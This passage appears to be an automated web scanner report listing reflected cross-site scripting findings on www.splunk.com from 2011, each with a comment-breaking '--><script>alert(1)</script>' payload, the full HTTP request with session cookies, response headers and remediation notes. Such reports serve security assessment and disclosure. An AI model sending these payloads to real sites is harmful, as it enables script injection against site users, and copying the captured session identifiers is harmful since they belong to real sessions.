GET /viewc2db0--><script>alert(1)</script>5fa0ec96c9f/about-us/SP-CAAAAH8 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:14 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:14 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:14 GMT; path=/ ETag: 253c2d09a4647113aa3e17c02474d0491296944294 Last-Modified: Sat, 05 Feb 2011 22:18:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 9a0d4--><script>alert(1)</script>fe1ada0d8d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/about-us9a0d4--><script>alert(1)</script>fe1ada0d8d7/SP-CAAAAH8 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload e5119--><script>alert(1)</script>8a69136f1cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/about-us/SP-CAAAAH8e5119--><script>alert(1)</script>8a69136f1cc HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.514. http://www.splunk.com/view/about-us/SP-CAAAAH8 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/about-us/SP-CAAAAH8
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ed8ae--><script>alert(1)</script>025e905c8f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/about-us/SP-CAAAAH8?ed8ae--><script>alert(1)</script>025e905c8f5=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:17:15 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 54966
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6cf3e--><script>alert(1)</script>974aee27b52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view6cf3e--><script>alert(1)</script>974aee27b52/application-management-solutions/SP-CAAADSC HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:16:44 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:46:44 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:46:44 GMT; path=/ ETag: 3b62969d966c7371419a601bcdfcf1331296944204 Last-Modified: Sat, 05 Feb 2011 22:16:44 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18463
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload d7f52--><script>alert(1)</script>77c3173cae0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/application-management-solutionsd7f52--><script>alert(1)</script>77c3173cae0/SP-CAAADSC HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:17:14 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:47:14 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:47:14 GMT; path=/ ETag: 084d3cca0270f7d30f7bb04a60af58bf1296944235 Last-Modified: Sat, 05 Feb 2011 22:17:15 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18463
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload c325c--><script>alert(1)</script>14d03973bc1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/application-management-solutions/SP-CAAADSCc325c--><script>alert(1)</script>14d03973bc1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.518. http://www.splunk.com/view/application-management-solutions/SP-CAAADSC [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/application-management-solutions/SP-CAAADSC
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b26a3--><script>alert(1)</script>13848164faa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/application-management-solutions/SP-CAAADSC?b26a3--><script>alert(1)</script>13848164faa=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:49 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 5697bc07fa3f5f88321b637974dcedfb1296944153 Last-Modified: Sat, 05 Feb 2011 22:15:53 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 39782
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload fffc3--><script>alert(1)</script>b23d9f63288 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewfffc3--><script>alert(1)</script>b23d9f63288/awards/SP-CAAADTE HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:33 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:33 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:33 GMT; path=/ ETag: 49c9355ec9fcf9b18292d767854accbb1296944314 Last-Modified: Sat, 05 Feb 2011 22:18:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload a9e0c--><script>alert(1)</script>f4ed59a9ce8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/awardsa9e0c--><script>alert(1)</script>f4ed59a9ce8/SP-CAAADTE HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 3af7c--><script>alert(1)</script>f2932ecd793 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/awards/SP-CAAADTE3af7c--><script>alert(1)</script>f2932ecd793 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.522. http://www.splunk.com/view/awards/SP-CAAADTE [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/awards/SP-CAAADTE
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e1d30--><script>alert(1)</script>106c367054 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/awards/SP-CAAADTE?e1d30--><script>alert(1)</script>106c367054=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:17:41 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 35213
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
